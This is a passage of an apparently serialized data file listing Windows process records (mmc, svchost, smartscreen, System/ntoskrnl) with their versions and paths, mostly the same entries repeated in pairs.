Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\",\"Cmd(name='backgroundTaskHost', params={'backgroundTaskHost', '10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/system32/backgroundtaskhost.exe'})\",\"Cmd(name='smartscreen', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/system32/smartscreen.exe', 'smartscreen'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\"],[\"Cmd(name='System', params={'System', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.3630', 'c:/windows/system32/ntoskrnl.exe'})\",\"Cmd(name='System', params={'System', 'Microsoft\\u00ae 